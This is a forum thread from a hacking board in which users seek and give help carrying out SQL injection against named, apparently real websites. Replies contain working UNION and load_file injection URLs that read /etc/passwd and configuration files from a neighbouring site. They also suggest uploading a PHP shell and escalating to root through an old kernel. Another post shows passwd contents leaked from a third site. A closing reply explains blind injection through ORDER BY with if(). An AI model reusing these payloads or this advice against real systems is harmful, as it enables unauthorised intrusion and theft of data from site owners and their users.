Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 01:30AM

Hi all!

I have a website which is vulnerable to SQL injection in 2 variables, which are in a LIMIT and in an ORDER BY clauses.

This is the first step I've done in order to verify that the orderBy variable was actually vulnerable:

h t t p ://w w w .videocatwalk.com/index.php?firstRec=0&sbxModels=&orderBy='

And the reply was:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\', id DESC LIMIT 0, 15' at line 8

It is surely an ORDER BY clause.

I understand that I can try to manually find table names and columns, in this way:

&orderBy=id [if no errors, COLUMN id exists]
&orderBy=users.id [if no errors, TABLE users exists]

But how can I exploit this flaw in order to find the table name and the columns without manually attempting?

Another flaw is in the firstRec variable. It is a LIMIT flaw and it could be exploited to do an UNION SELECT query. No multiple queries are allowed, it seems... And the ';' char doesn't work. There's magic_quotes activated.

Please help me, or at least try and let us know if you find out something.

Thank you to all!

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: kuza55
Date: December 30, 2006 04:20AM

If its not a blind SQL query then your best bet for finding table and column names is always to perform a UNION command and selecting some data from the INFORMATION_SCHEMA database/views.

Just do a google search for INFORMATION_SCHEMA and you'll find some useful links.

And no matter where you are in a query, you can always do a UNION because you can just comment out everything after where injection point.

Hope that helps.

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 05:49AM

Thanks for your reply.

I already knew about INFORMATION_SCHEMA, but how about seeing a pratical example on that server? I couldn't exploit it!

http://www.videocatwalk.com/index.php?firstRec=0&sbxModels=&orderBy=nudity%20DESC

How would you exploit that query knowing that firstRec is a LIMIT field vulnerable and orderBy an ORDER BY?

A pratical example on how to find table name and columns would be great.

Thank you so much!

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: kuza55
Date: December 30, 2006 06:09AM

Well, it seems that you can't do anything with the orderBy parameter, because it only allows a certain amount of characters, 15 in this case, which is clearly not enough. Also it seems that intval() is called on firstRec, so you're not going to have any luck there.

So from what I can see, you're not going to be able to attack that site via either of those parameters.

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 07:46AM

Thank you :)

Is anybody able to do some real SQL injection on that site?

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 08:31AM

There's an admin area here http://www.videocatwalk.com/adm/ (username: admin, password: admin) but it doesn't seem to work.

There's also http://www.videocatwalk.com/info.php (a phpinfo() page) and http://www.videocatwalk.com/admin/ directory, password protected.

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: beford
Date: April 12, 2007 01:58AM

since you can't easily hax in this site, try getting in using other site hosted on the same server:

hxxp://www.vbreger.com/catalog.php?id=-1+union+select+load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,47,104,116,100,111,99,115,47,118,98,114,101,103,101,114,47,99,111,110,102,105,103,47,70,117,110,99,116,105,111,110,115,47,68,97,116,101,98,97,115,101,46,112,104,112)),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+current_user(),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+GROUP_CONCAT(user),2,3,4,5+from+mysql.user+group+by+file_priv/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+version(),2,3,4,5/*

It seems to be using mysql as root@localhost, so you shouldn't have problems 'dumping' a phpshell, unless you can't find a dir with write permissions. You can try reading files from ftvnudes dir to get databasenames, tables, etc. (ftvnudes.com == videocatwalk.com)

Btw, that looks like an old kernel version, you can probably get root.



Edited 2 time(s). Last edit at 04/12/2007 02:34AM by beford.

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: Chuks
Date: August 14, 2007 01:56PM

I tried load_file on a site.like the above:

 http://www.wananchi.co.ke/final/faqdetails.php?FaqID=-1%20union%20select%201,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3,4/*

Where i'm going wrong coz it gives me this error

## # User Database # # Note that this file is consulted when the system is running in single-user # mode. At other times this information is handled by one or more of: # lookupd DirectoryServices # By default, lookupd gets information from NetInfo, so

Options: ReplyQuote
Re: LIMIT and ORDER BY MySQL injection
Posted by: H
Date: January 30, 2009 02:42PM

kuza55 Wrote:
-------------------------------------------------------
> And no matter where you are in a query, you can
> always do a UNION because you can just comment out
> everything after where injection point.

If you can only inject after ORDER BY then a UNION won't work, as ORDER BY has to be at the end of the query:

mysql> select * from two order by id union select * from test;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

However, there is a way you can exploit an injection into an ORDER BY clause by using an if() statement to decide which column(s) to order by:

mysql> select * from two;
+------+------+
| id | data |
+------+------+
| 0 | 0 |
| 0 | 1 |
| 1 | 1 |
| 2 | 3 |
| 4 | 5 |
+------+------+
5 rows in set (0.00 sec)

mysql> select * from two order by if(1=1,id,data) desc;
+------+------+
| id | data |
+------+------+
| 4 | 5 |
| 2 | 3 |
| 1 | 1 |
| 0 | 0 |
| 0 | 1 |
+------+------+
5 rows in set (0.00 sec)

mysql> select * from two order by if(1=2,id,data) desc;
+------+------+
| id | data |
+------+------+
| 4 | 5 |
| 2 | 3 |
| 0 | 1 |
| 1 | 1 |
| 0 | 0 |
+------+------+
5 rows in set (0.00 sec)

Any subquery should be possible instead of 1=2, so this should be exploitable using tools such as FG Injector if you can cause a difference in output by changing the column ordered by.

Options: ReplyQuote


Sorry, only registered users may post in this forum.